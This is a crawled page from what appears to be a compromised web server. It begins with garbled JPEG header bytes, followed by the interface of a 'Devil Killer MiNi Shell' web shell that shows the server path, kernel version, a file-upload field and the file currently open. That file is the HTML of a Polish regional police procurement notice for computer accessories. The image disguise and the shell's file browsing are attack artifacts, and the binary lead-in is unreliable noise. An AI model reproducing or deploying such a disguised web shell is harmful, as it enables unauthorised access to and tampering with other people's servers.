JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230120/0004812401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa akcesoriów informatycznych, komputerowych oraz części zamiennych do drukarek i urządzeń wielofunkcyjnych na potrzeby Komendy Wojewódzkiej Policji w Lublinie i jej jednostek podległych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 430689052</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gabriela Narutowicza 73</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-019</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">47 811 54 15</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">47 811 15 34</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@lu.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lubelska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa akcesoriów informatycznych, komputerowych oraz części zamiennych do drukarek i urządzeń wielofunkcyjnych na potrzeby Komendy Wojewódzkiej Policji w Lublinie i jej jednostek podległych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-22ac1521-97de-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00048124</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00028404/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa akcesoriów informatycznych, komputerowych oraz części zamiennych do drukarek i urządzeń wielofunkcyjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-22ac1521-97de-11ed-b4ea-f64d350121d2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej. <br/>Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>Zamawiający korzysta, w postępowaniu o udzielenie zamówienia, tylko z takich narzędzi i urządzeń komunikacji elektronicznej, które są niedyskryminujące, ogólnie dostępne oraz interoperacyjne <br/>w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2019 r. poz. 700, 730, 848 i 1590), z produktami powszechnie używanymi służącymi elektronicznemu przechowywaniu, przetwarzaniu i przesyłaniu danych, i które nie ograniczają wykonawcom dostępu do postępowania o udzielenie zamówienia lub konkursu. <br/>Zamawiający nie przewiduje sposobu komunikowania się z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/><br/>1.	Informacje ogólne<br/>1)	Stroną internetową prowadzonego postępowania jest Platforma e-Zamówienia: https://ezamowienia.gov.pl/<br/>2)	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl/<br/>3)	Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4)	Postępowanie można wyszukać ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”). <br/>5)	W uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: zamowienia@lu.policja.gov.pl, (z wyjątkiem składania ofert, które należy składać w sposób określony w rozdziale XIII).<br/>6)	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia, dostępny pod adresem:<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu).<br/>7)	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999, lub drogą elektroniczną, poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. <br/>8)	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na Platformę e-Zamówienia. <br/>9)	Link do postępowania oraz identyfikator postępowania nadany przez Platformę e-Zamówienia zamieszczone są na stronie internetowej zamawiającego: https://lubelska.policja.gov.pl<br/>10) Zamawiający zaleca aby załączniki i dokumenty składane przez wykonawcę były przekazywane w szczególności w następujących formatach: .pdf, .odt, .doc, .docx, .xls, xlsx, .zip, .7zip.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych <br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>-	Administratorem pozyskiwanych danych osobowych jest Komendant Wojewódzki Policji w Lublinie, z siedzibą przy ul. Narutowicza 73, tel. 47 811 57 37;<br/>-	Dane kontaktowe Inspektora Ochrony Danych w Komendzie Wojewódzkiej Policji w Lublinie: e-mail: iod.kwp@lu.policja.gov.pl;<br/>-	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Dostawa akcesoriów informatycznych, komputerowych oraz części zamiennych do drukarek i urządzeń wielofunkcyjnych na potrzeby Komendy Wojewódzkiej Policji w Lublinie i jej jednostek podległych”, nr referencyjny 02/1.2.3/22/SZP/D;<br/>-	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U z 2022 r. poz. 1710 z późn zm.), dalej „ustawa Pzp”;<br/>-	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały okres obowiązywania umowy; <br/>-	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>-	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO; <br/>-	Posiada Pani/Pan: <br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, <br/>o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, <br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>-	Nie przysługuje Pani/Panu: <br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>- Jeżeli administrator planuje dalej przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane, przed takim dalszym przetwarzaniem informuje on osobę, której dane dotyczą, o tym innym celu oraz udziela jej wszelkich innych stosownych informacji, o których mowa art. 13 ust. 2 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">02/1.2.3/23/SZP/D</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 334442,28 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa akcesoriów komputerowych na potrzeby KWP w Lublinie i jednostek podległych.<br/>2.	Szczegółowy opis i zakres przedmiotu zamówienia został określony w Formularzu cenowym - załącznik nr 1.1 (będący jednocześnie specyfikacją techniczną) oraz we wzorze umowy - załącznik nr 4, stanowiących załączniki do Specyfikacji Warunków Zamówienia (SWZ). <br/>3.	Zaoferowany przez wykonawcę asortyment musi spełniać wszystkie wymagania określone przez Zamawiającego w dokumentach zamówienia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 135439,03 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30237200-1 - Akcesoria komputerowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami:<br/>Dla pakietu nr 1 <br/>1)	cena oferty brutto (C) - 60% (odpowiada 60 pkt)<br/>2)	gwarancja na dyski twarde (poz. nr 6, 7, 10, 11, 12, 13, 14) (G) – 30% (odpowiada 30 pkt)<br/>3)	termin realizacji zamówienia cząstkowego (T) – 10% (odpowiada 10 pkt)<br/><br/>ad 1) cena oferty brutto (C) - 60% <br/>Dla kryterium – cena oferty brutto, ilość punktów będzie obliczona wg wzoru:<br/><br/> Najniższa cena ofertowa z przedłożonych ofert	<br/>	C = ------------------------------------------------------	x60<br/> Cena oferty badanej	<br/><br/>Przy ocenie tego kryterium Zamawiający będzie brał pod uwagę cenę brutto podaną w załączniku nr 1 do SWZ (druk „Oferta”). <br/><br/>ad 2) Okres gwarancji na dyski twarde (poz. nr 6, 7, 10, 11, 12, 13, 14) (G) - 30% <br/><br/>Obliczenie punktów w przedmiotowym kryterium Zamawiający dokonana w oparciu o poniższe zapisy: <br/>- okres gwarancji na dyski twarde – 48 miesięcy – 30 pkt<br/>- okres gwarancji na dyski twarde – 36 miesięcy – 15 pkt<br/>- okres gwarancji na dyski twarde - 24 miesiące – 0 pkt<br/>Przy ocenie tego kryterium Zamawiający będzie brał pod uwagę „okres gwarancji na dyski twarde” na podstawie zaznaczonego, jednego z trzech powyższych wariantów, w wyznaczonym miejscu, <br/>w załączniku nr 1 do SWZ „Oferta” (dotyczy pakietu nr 1), dotyczącym przedmiotowego kryterium (uzyskać można 30, 15 lub 0 punktów). <br/>Wykonawca powinien zaznaczyć (np. poprzez postawienie krzyżyka 1) oferowany okres gwarancji (zaznaczyć jeden).<br/>W przypadku, gdy wykonawca nie wskaże okresu gwarancji (nie zaznaczy lub zaznaczy dwa lub trzy warianty) przyjmuje się, oświadczenie wykonawcy z pkt 4 załącznika nr 1 do SWZ druk „oferta”, co wskazuje, że zaoferował on minimalny okres gwarancji wskazany przez Zamawiającego tj. 24 miesiące.<br/>Wykonawca otrzyma odpowiednio 0 pkt w tym kryterium.<br/><br/>ad 3) termin realizacji zamówienia cząstkowego (T) – 10%<br/><br/>Dla kryterium – termin realizacji zamówienia cząstkowego, ilość punktów będzie obliczona zgodnie <br/>z poniższymi zasadami:<br/><br/>- termin realizacji zamówienia cząstkowego – do 10 dni roboczych – 10 pkt<br/>- termin realizacji zamówienia cząstkowego – do 15 dni roboczych – 5 pkt<br/>- termin realizacji zamówienia cząstkowego – do 20 dni roboczych – 0 pkt<br/><br/>Przy ocenie tego kryterium Zamawiający będzie brał pod uwagę „termin realizacji zamówienia cząstkowego” na podstawie zaznaczonego jednego z trzech powyższych wariantów w wyznaczonym miejscu w załączniku nr 1 do SWZ dotyczącym przedmiotowego kryterium (uzyskać można odpowiednio 30, 15 lub 0 punktów). <br/>Wykonawca powinien zaznaczyć (np.: poprzez postawienie krzyżyka 1) oferowany termin realizacji zamówienia cząstkowego (można zaznaczyć tylko jeden).<br/>Przez dni robocze Zamawiający rozumie od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy. Jeżeli koniec terminu do wykonania czynności przypada na dzień ustawowo wolny od pracy, termin upływa dnia następnego po dniu lub dniach wolnych od pracy.<br/>Zaoferowany przez wykonawcę termin realizacji zamówienia cząstkowego zostanie wpisany do umowy (§ 4 ust. 1 wzoru umowy). <br/><br/>Szczegółowy opis kryteriów oceny ofert zawarty jest w rozdziale XX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja na dyski twarde</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia cząstkowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa akcesoriów informatycznych na potrzeby KWP w Lublinie i jednostek podległych.<br/>2.	Szczegółowy opis i zakres przedmiotu zamówienia został określony w Formularzu cenowym - załącznik nr 1.2 (będący jednocześnie specyfikacją techniczną) oraz we wzorze umowy - załącznik nr 4, stanowiących załączniki do Specyfikacji Warunków Zamówienia (SWZ). <br/>3.	Zaoferowany przez wykonawcę asortyment musi spełniać wszystkie wymagania określone przez Zamawiającego w dokumentach zamówienia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 104175,61 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30237300-2 - Wyroby komputerowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>Dla pakietów nr 2, 3 i 4 <br/>1)	cena oferty brutto (C) - 60% (odpowiada 60 pkt)<br/>2)	termin realizacji zamówienia cząstkowego (T) – 40% (odpowiada 40 pkt)<br/><br/>ad 1) 60% – cena oferty brutto (C)<br/>Dla kryterium – cena oferty brutto, ilość punktów będzie obliczona wg wzoru:<br/><br/> Najniższa cena ofertowa z przedłożonych ofert	<br/>	C=------------------------------------------------------	x60<br/> Cena oferty badanej	<br/><br/>Przy ocenie tego kryterium Zamawiający będzie brał pod uwagę cenę brutto podaną <br/>w załączniku nr 1 do SWZ (druk „Oferta”). <br/><br/>ad 2) termin realizacji zamówienia cząstkowego (T) – 40%<br/><br/>Dla kryterium – termin realizacji zamówienia cząstkowego, ilość punktów będzie obliczona zgodnie <br/>z poniższymi zasadami:<br/><br/>- termin realizacji zamówienia cząstkowego – do 5 dni roboczych – 40 pkt<br/>- termin realizacji zamówienia cząstkowego – do 7 dni roboczych – 20 pkt<br/>- termin realizacji zamówienia cząstkowego – do 9 dni roboczych – 0 pkt<br/><br/>Przy ocenie tego kryterium Zamawiający będzie brał pod uwagę „termin realizacji zamówienia cząstkowego” na podstawie zaznaczonego jednego z trzech powyższych wariantów w wyznaczonym miejscu w załączniku nr 1 do SWZ dotyczącym przedmiotowego kryterium (uzyskać można odpowiednio 40, 20 lub 0 punktów). <br/>Wykonawca powinien zaznaczyć (np.: poprzez postawienie krzyżyka 1) oferowany termin realizacji zamówienia cząstkowego (można zaznaczyć tylko jeden).<br/>Przez dni robocze Zamawiający rozumie od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy. Jeżeli koniec terminu do wykonania czynności przypada na dzień ustawowo wolny od pracy, termin upływa dnia następnego po dniu lub dniach wolnych od pracy.<br/>Zaoferowany przez Wykonawcę termin realizacji zamówienia cząstkowego zostanie wpisany do umowy (§ 4 ust. 1 wzoru umowy). 